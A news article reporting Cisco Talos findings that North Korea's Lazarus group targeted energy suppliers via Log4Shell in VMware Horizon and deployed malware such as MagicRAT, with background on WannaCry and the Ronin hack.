Power suppliers from around the world, including the United States, Canada and Japan, have reportedly been targeted by the state-sponsored North Korean hacker group Lazarus, also known as APT38.
According to Cisco’s Talos Intelligence group (opens in new tab)the campaign aims to infiltrate organizations around the world for the purpose of gaining long-term access and then exfiltration of data of interest to the nation-state.
While the precise targets have remained unnamed, the attacks demonstrate once again the threat North Korea and Lazarus can pose through destabilization efforts.
How did the attack go?
According to Talos, this campaign involved exploiting vulnerabilities in the virtual desktop product VMWare Horizon to gain a first foothold with targeted organizations.
After successfully accessing the targeted corporate networks, the group then deployed custom malware implants, including the HTML bots VSingle and YamaBot.
In addition to these known malware families, they also claimed to have discovered the use of a previously unknown malware implant called “MagicRAT”.
The first entry into the organizations was reportedly made using Log4Shell (CVE-2021-44228), a zero-day vulnerability in Log4j, a popular Java logging framework, where arbitrary code is executed.
Cybersecurity firm Tenable previously called Log4Shell “the largest, most critical vulnerability ever”.
This wouldn’t be the first time North Korea has been involved in attacks on foreign powers; Kaspersky Lab security researchers have linked North Korea to the Wannacry ransomware attack that shut down 300,000 computers in 150 countries and caused unprecedented problems for the UK’s NHS.
Since its inception in 2010, the Lazarus group has certainly been busy like nothing else. Lately, it has turned its attention to the world of blockchains and DeFi.
Lazarus was linked to a $615 million attack on the Ronin sidechain that powers the popular blockchain-integrated game Axie Infinity, which is known as one of the biggest DefI hacks to date.
- Worried that hackers will penetrate your organization? Check out our guide to the best endpoint security.